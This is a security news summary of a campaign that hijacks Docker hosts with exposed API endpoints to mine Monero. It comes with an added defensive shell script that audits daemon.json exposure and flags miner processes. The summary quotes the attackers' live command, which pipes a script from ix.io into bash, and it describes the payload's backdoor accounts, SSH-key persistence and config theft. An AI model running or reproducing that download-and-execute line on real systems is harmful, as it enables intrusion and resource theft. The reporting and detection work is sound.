A currently unidentified group is mass-scanning the internet for Linux servers running Docker with their API endpoints exposed, and is using those endpoints to mine the Monero cryptocurrency. The group is currently scanning more than 59,000 netblocks looking for exposed Docker instances. Once a vulnerable instance has been identified, the group runs the command chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;' which downloads and runs a Bash script from the attacker's server. The script then installs an XMRig cryptocurrency miner. In the two days that the campaign has been active, it appears the attackers have already mined 14.82 Monero coins (XMR), approximately $740 USD. The group uninstalls known monitoring agents on the exposed Docker instances and kills a number of other processes, shutting down not only security products but also processes associated with rival mining botnets. The script also scans the infected host for configuration files, which it both encrypts and steals, installs backdoor accounts, and leaves behind SSH keys so the attackers can more easily regain access to the infected host.
While the group may not seem to be pulling down much money for the wide net it is casting, it is important to remember that the campaign is still in its early days; as more hosts become infected, the group's profits will grow at a sharper rate. Review any Docker instances to ensure that API endpoints are not exposed to the Internet unnecessarily, and review the running processes on each Docker host, stopping any that cannot be accounted for. More details on this campaign can be found at https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/
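The two review steps above (is the Docker API reachable over the network, and is anything miner-like running) can be turned into a small audit script. The following is an added example written for this page, not code from the article or from the campaign it describes. It assumes the Docker daemon configuration lives in the usual /etc/docker/daemon.json layout with a "hosts" array (it uses grep rather than a full JSON parser), and the daemon.json files and the ps listing it checks are constructed sample inputs so the script runs offline.

```shell
#!/bin/sh
# Added example (not from the original article). Two defender-side checks for
# the exposure this campaign relies on:
#   1. audit_docker_hosts   - inspect a Docker daemon.json for an API listener
#                             bound to a non-loopback TCP address without TLS
#   2. flag_miner_processes - scan a `ps` listing for miner-like processes
# The daemon.json samples and the ps listing below are constructed for the demo.

# audit_docker_hosts FILE: prints findings; returns 1 if an unauthenticated
# TCP listener is configured on a non-loopback address, 0 otherwise.
# Assumes a conventional "hosts" array with one tcp:// entry per quoted string.
audit_docker_hosts() {
    file="$1"
    tcp_hosts=$(grep -o 'tcp://[^"]*' "$file" 2>/dev/null || true)
    if [ -z "$tcp_hosts" ]; then
        echo "OK: no TCP API listener configured in $file"
        return 0
    fi
    tlsverify=$(grep -o '"tlsverify"[[:space:]]*:[[:space:]]*true' "$file" || true)
    exposed=0
    for h in $tcp_hosts; do
        addr=${h#tcp://}      # strip the scheme
        addr=${addr%:*}       # strip the port, leaving the bind address
        case "$addr" in
            127.0.0.1|localhost|"[::1]")
                echo "OK: $h is loopback-only" ;;
            *)
                if [ -z "$tlsverify" ]; then
                    echo "EXPOSED: $h accepts API calls without TLS client auth"
                    exposed=1
                else
                    echo "WARN: $h is network-reachable; TLS client certs required"
                fi ;;
        esac
    done
    return $exposed
}

# flag_miner_processes: read `ps -eo pid,user,comm,args` output on stdin and
# print rows whose command looks like a known miner (binary name or a
# stratum mining-pool URL); returns 1 if any were found, 0 if the list is clean.
flag_miner_processes() {
    found=$(grep -iE 'xmrig|stratum\+tcp://|minerd' || true)
    if [ -z "$found" ]; then
        return 0
    fi
    echo "$found"
    return 1
}

# --- constructed sample inputs (hypothetical paths and values) ---
WORK=$(mktemp -d)
SAFE_SAMPLE="$WORK/daemon-safe.json"       # API on the unix socket + loopback TCP
EXPOSED_SAMPLE="$WORK/daemon-exposed.json" # API on all interfaces, no TLS
cat > "$SAFE_SAMPLE" <<'EOF'
{ "hosts": ["unix:///var/run/docker.sock", "tcp://127.0.0.1:2375"] }
EOF
cat > "$EXPOSED_SAMPLE" <<'EOF'
{ "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"] }
EOF
PS_SAMPLE=$(cat <<'EOF'
PID USER COMM ARGS
1 root systemd /sbin/init
2231 root dockerd /usr/bin/dockerd -H fd://
4817 root xmrig /tmp/.x/xmrig -o stratum+tcp://pool.example.invalid:3333
EOF
)

# --- demo run ---
for f in "$SAFE_SAMPLE" "$EXPOSED_SAMPLE"; do
    audit_docker_hosts "$f" || echo "  -> action: bind to loopback/unix socket or enable tlsverify"
done
printf '%s\n' "$PS_SAMPLE" | flag_miner_processes || echo "  -> action: investigate and stop the flagged process"
```

On a real host, point audit_docker_hosts at /etc/docker/daemon.json (and check any -H flags in the systemd unit, which the script does not read), and feed flag_miner_processes with ps -eo pid,user,comm,args. A loopback-only or unix-socket listener is not reachable by the scanner described above; a TCP listener with tlsverify still deserves a look at who holds client certificates.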